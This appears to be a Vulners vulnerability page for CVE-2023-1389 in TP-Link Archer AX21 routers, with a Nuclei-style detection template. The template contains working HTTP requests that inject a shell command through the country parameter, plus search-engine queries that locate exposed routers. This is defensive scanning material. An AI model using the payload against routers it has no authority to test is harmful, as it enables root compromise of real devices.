| Reporter | Title | Published | Views | Family All 44 |
|---|---|---|---|---|
| TP-Link Archer AX21 - Unauthenticated Command Injection Exploit | 10 Aug 202300:00 | – | zdt | |
| Exploit for CVE-2014-8361 | 31 Mar 202611:18 | – | githubexploit | |
| Exploit for Command Injection in Tp-Link Archer_Ax21_Firmware | 28 Jul 202303:09 | – | githubexploit | |
| Exploit for Command Injection in Tp-Link Archer_Ax21_Firmware | 8 May 202405:41 | – | githubexploit | |
| CVE-2023-1389 | 15 Mar 202300:00 | – | attackerkb | |
| The vulnerability in the web interface for managing TP-Link Archer AX21 (AX1800 routers allows a hacker to execute arbitrary commands with root privileges. | 30 Mar 202300:00 | – | bdu_fstec | |
| CVE-2023-1389 | 25 Apr 202311:56 | – | circl | |
| TP-Link Archer AX-21 Command Injection Vulnerability | 1 May 202300:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 1 May 202312:00 | – | cisa | |
| TP-LINK Archer AX21 命令注入漏洞 | 15 Mar 202300:00 | – | cnnvd |
id: CVE-2023-1389
info:
name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
author: ritikchaddha
severity: critical
description: |
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
impact: |
Unauthenticated attackers can exploit OS command injection through the country parameter in the locale endpoint to execute arbitrary commands as root and completely compromise TP-Link Archer AX21 routers.
remediation: |
Update to the latest firmware version provided by TP-Link.
reference:
- https://www.tenable.com/security/research/tra-2023-11
- https://nvd.nist.gov/vuln/detail/CVE-2023-1389
- https://github.com/tenable/poc-cve-2023-1389
classification:
cve-id: CVE-2023-1389
cwe-id: CWE-78
epss-score: 0.99999
epss-percentile: 0.99991
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
max-request: 1
vendor: tp-link
product: archer-ax21
fofa-query: body="tp-link"
shodan-query: 'title:"TP-Link Router"'
verified: true
tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev,vkev,vuln
http:
- raw:
- |
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id)
- |
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id)
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4b0a00483046022100ec06314af8324f7ba7322f573e3f0981afd84f4e9625798ba176b6ca4dcf7ffc022100f7e73f6b513b90404a501364719d3dfecddcde50f66a04760011ae82b59035af:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation